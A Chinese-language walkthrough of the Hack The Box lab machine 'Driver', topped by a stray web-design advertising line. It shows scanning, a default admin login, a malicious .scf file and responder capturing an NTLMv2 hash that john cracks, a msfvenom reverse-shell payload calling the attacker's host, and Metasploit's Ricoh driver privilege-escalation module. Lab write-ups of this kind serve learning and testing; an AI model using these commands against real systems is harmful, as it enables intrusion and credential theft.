衡水網(wǎng)站網(wǎng)站建設(shè)成都最好的網(wǎng)站推廣優(yōu)化公司
目錄
連接至HTB服務(wù)器并啟動靶機(jī)
信息收集
使用rustscan對靶機(jī)TCP端口進(jìn)行開放掃描
將靶機(jī)TCP開放端口號提取并保存
使用nmap對靶機(jī)TCP開放端口進(jìn)行腳本、服務(wù)掃描
使用nmap對靶機(jī)TCP開放端口進(jìn)行漏洞、系統(tǒng)掃描
使用nmap對靶機(jī)常用UDP端口進(jìn)行開放掃描
使用smbclient嘗試root用戶空密碼登錄靶機(jī)SMB服務(wù)
邊界突破
使用瀏覽器訪問靶機(jī)80端口
使用Yakit抓取請求包
仿照該憑證格式,使用字典嘗試爆破密碼
使用上述憑證通過該頁面認(rèn)證后進(jìn)入面板
嘗試上傳.scf文件利用SMB反射獲取用戶憑證
使用responder開始欺騙及監(jiān)聽客戶端
將該哈希值寫入文件以便爆破
使用john對該哈希文件進(jìn)行字典爆破
使用evil-winrm通過上述憑證登錄靶機(jī)Win-RM服務(wù)
權(quán)限提升
查看靶機(jī)C盤根目錄
查看靶機(jī)系統(tǒng)內(nèi)用戶
查看當(dāng)前用戶賬戶信息
查看當(dāng)前用戶權(quán)限信息
查看當(dāng)前用戶PS歷史記錄
查找該驅(qū)動所在目錄路徑
?使用大模型搜索該驅(qū)動是否存在提權(quán)漏洞
使用searchsploit搜索該漏洞
使用msfvenom生成Payload
將該P(yáng)ayload上傳至靶機(jī)中
啟動Metasploit
檢索該漏洞模塊
連接至HTB服務(wù)器并啟動靶機(jī)
靶機(jī)IP:10.10.11.106
分配IP:10.10.16.13
信息收集
使用rustscan對靶機(jī)TCP端口進(jìn)行開放掃描
rustscan -a 10.10.11.106 -r 1-65535 --ulimit 5000 | tee res
將靶機(jī)TCP開放端口號提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,??????? ?
80,135,445,5985
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# echo $ports
80,135,445,5985
使用nmap對靶機(jī)TCP開放端口進(jìn)行腳本、服務(wù)掃描
nmap -sT -p$ports -sCV -Pn 10.10.11.106
- 需要重點(diǎn)關(guān)注的端口和服務(wù)
80端口:IIS服務(wù)
445端口:SMB服務(wù)
5985端口:Win-RM服務(wù)
使用nmap對靶機(jī)TCP開放端口進(jìn)行漏洞、系統(tǒng)掃描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.106
使用nmap對靶機(jī)常用UDP端口進(jìn)行開放掃描
nmap -sU --top-ports 20 -Pn 10.10.11.106
使用smbclient嘗試root用戶空密碼登錄靶機(jī)SMB服務(wù)
smbclient -L \\10.10.11.106
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# smbclient -L \\10.10.11.106
Password for [WORKGROUP\root]:
session setup failed: NT_STATUS_ACCESS_DENIED
邊界突破
使用瀏覽器訪問靶機(jī)80端口
- 提示需要用戶名和密碼
使用Yakit抓取請求包
- 其中,請求頭中的Authorization參數(shù)用于發(fā)送憑證
- 對Basic后的字符串進(jìn)行解碼
仿照該憑證格式,使用字典嘗試爆破密碼
Authorization: Basic YWRtaW46YWRtaW4=
- Base64解碼后
賬戶:admin
密碼:admin
- 將靶機(jī)IP與主域名進(jìn)行綁定使DNS從本地解析
sed -i '1i 10.10.11.106 driver.htb' /etc/hosts
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.11.106 driver.htb' /etc/hosts
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# head -n1 /etc/hosts????????????????????????? ?
10.10.11.106 driver.htb
使用上述憑證通過該頁面認(rèn)證后進(jìn)入面板
- 這里不知道為啥加載出來是這樣的,反正也是轉(zhuǎn)了半天
- 點(diǎn)擊左上角的Firmware Updates進(jìn)入固件更新頁,該頁允許文件上傳
- 該頁面中存在描述:Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
翻譯:選擇打印機(jī)型號并將相應(yīng)的固件更新上傳到我們的文件共享。我們的測試團(tuán)隊(duì)將手動審查上傳并盡快啟動測試。
- 因此,從這里上傳的所有文件應(yīng)當(dāng)都會保存在靶機(jī)SMB服務(wù)器中,換句話說通過該頁面我們擁有了向靶機(jī)SMB服務(wù)器寫入文件的權(quán)限
嘗試上傳.scf文件利用SMB反射獲取用戶憑證
基于SCF文件的SMB中繼攻擊:攻擊者上傳精心構(gòu)造的惡意.scf文件到SMB服務(wù)器共享目錄,用戶瀏覽該目錄時(shí),系統(tǒng)自動解析.scf文件觸發(fā)向惡意服務(wù)器的訪問請求,進(jìn)而以用戶身份發(fā)送NTLMv2認(rèn)證請求,攻擊者截獲并獲取該用戶的NTLMv2憑證 。
- 構(gòu)造一個(gè)惡意的.scf文件
[Shell]
Command=2
IconFile=\\10.10.16.13\test
使用responder開始欺騙及監(jiān)聽客戶端
responder -wv -I tun0
- 選擇文件后,點(diǎn)擊Submit開始上傳
- 攻擊機(jī)responder收到回顯
- tony用戶哈希值
tony::DRIVER:cc7a5be9edf57e2b:B00C7598710E1FEB3662800CB261B7F3:0101000000000000009AE12B6165DB0140FB9FA2F3FF07460000000002000800420050005000370001001E00570049004E002D004100530034003900330053004C004C0046004300390004003400570049004E002D004100530034003900330053004C004C004600430039002E0042005000500037002E004C004F00430041004C000300140042005000500037002E004C004F00430041004C000500140042005000500037002E004C004F00430041004C0007000800009AE12B6165DB010600040002000000080030003000000000000000000000000020000092420DE18E3028DCAC604904C0367CAEF10C3B61D875F7E0ADB1D86EE62E88D90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003300000000000000000000000000
將該哈希值寫入文件以便爆破
echo 'tony::DRIVER:cc7a5be9edf57e2b:B00C7598710E1FEB3662800CB261B7F3:0101000000000000009AE12B6165DB0140FB9FA2F3FF07460000000002000800420050005000370001001E00570049004E002D004100530034003900330053004C004C0046004300390004003400570049004E002D004100530034003900330053004C004C004600430039002E0042005000500037002E004C004F00430041004C000300140042005000500037002E004C004F00430041004C000500140042005000500037002E004C004F00430041004C0007000800009AE12B6165DB010600040002000000080030003000000000000000000000000020000092420DE18E3028DCAC604904C0367CAEF10C3B61D875F7E0ADB1D86EE62E88D90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003300000000000000000000000000' > hash
使用john對該哈希文件進(jìn)行字典爆破
john hash --wordlist=../dictionary/rockyou.txt
賬戶:tony
密碼:liltony
使用evil-winrm通過上述憑證登錄靶機(jī)Win-RM服務(wù)
evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony'
- 在C:\Users\tony\Desktop目錄下找到user.txt文件
權(quán)限提升
查看靶機(jī)C盤根目錄
- 可見存在兩個(gè)Program Files目錄,因此靶機(jī)系統(tǒng)大概率為64位系統(tǒng)
查看靶機(jī)系統(tǒng)內(nèi)用戶
net user
- 靶機(jī)系統(tǒng)內(nèi)普通權(quán)限用戶僅有該用戶
查看當(dāng)前用戶賬戶信息
net user tony
- 該用戶沒有加入特殊權(quán)限組
查看當(dāng)前用戶權(quán)限信息
whoami /priv
- 沒有可利用的特權(quán)
查看當(dāng)前用戶PS歷史記錄
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\tony\Desktop> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'ping 1.1.1.1
ping 1.1.1.1
- Powershell歷史記錄中第一條命令整體功能為,向系統(tǒng)添加一個(gè)打印機(jī),其中驅(qū)動完整名稱:`RICOH PCL6 UniversalDriver V4.23`
查找該驅(qū)動所在目錄路徑
cmd /c dir /s /ad "RICOH PCL6 UniversalDriver V4.23"
- 該驅(qū)動所在位置:C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23
?使用大模型搜索該驅(qū)動是否存在提權(quán)漏洞
使用searchsploit搜索該漏洞
searchsploit --cve 2019-19363
- 由輸出可見,該漏洞集成于MSF中
使用msfvenom生成Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.13 LPORT=1425 -f exe > shell.exe
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.13 LPORT=1425 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
將該P(yáng)ayload上傳至靶機(jī)中
upload shell.exe
啟動Metasploit
msfconsole
- 切換到監(jiān)聽模塊
use exploit/multi/handler
- 配置好選項(xiàng):LHOST、LPORT、PAYLOAD,并開始監(jiān)聽
msf6 exploit(multi/handler) > set LHOST 10.10.16.13
LHOST => 10.10.16.13
msf6 exploit(multi/handler) > set LPORT 1425
LPORT => 1425
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.10.16.13:1425
- 控制靶機(jī)運(yùn)行Payload
.\shell.exe
- 攻擊機(jī)MSF監(jiān)聽端收到回顯
[*] Started reverse TCP handler on 10.10.16.13:1425
[*] Sending stage (203846 bytes) to 10.10.11.106
[*] Meterpreter session 1 opened (10.10.16.13:1425 -> 10.10.11.106:49431) at 2025-01-13 04:44:35 -0500meterpreter >
- 列出靶機(jī)系統(tǒng)進(jìn)程
ps
- 通過Session欄目判斷,為0則是系統(tǒng)進(jìn)程,為1則是用戶進(jìn)程。我嘗試將Meterpreter遷移進(jìn)用戶進(jìn)程explorer.exe中
migrate -N explorer.exe
meterpreter > migrate -N explorer.exe
[*] Migrating from 4256 to 3260...
[*] Migration completed successfully.
檢索該漏洞模塊
search 2019-19363
- 切換到該模塊
use exploit/windows/local/ricoh_driver_privesc
- 列出該模塊所需填寫的選項(xiàng)
show options
- 此處需要配置好的選項(xiàng):LHOST、LPORT、PAYLOAD、SESSION
msf6 exploit(windows/local/ricoh_driver_privesc) > set LHOST 10.10.16.13
LHOST => 10.10.16.13
msf6 exploit(windows/local/ricoh_driver_privesc) > set LPORT 1426
LPORT => 1426
msf6 exploit(windows/local/ricoh_driver_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ricoh_driver_privesc) > set SESSION 1
SESSION => 1
- 執(zhí)行該模塊
exploit
- 查找root.txt文件位置
search -f root.txt
meterpreter > search -f root.txt
Found 1 result...
=================Path???????????????????????????????????? Size (bytes)? Modified (UTC)
----???????????????????????????????????? ------------? --------------
c:\Users\Administrator\Desktop\root.txt? 34??????????? 2025-01-13 05:55:59 -0500
- 查看root.txt文件內(nèi)容
meterpreter > shell
Process 1876 created.
Channel 2 created.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
030cd5d04a90f1bd3c163e0bcd3280eb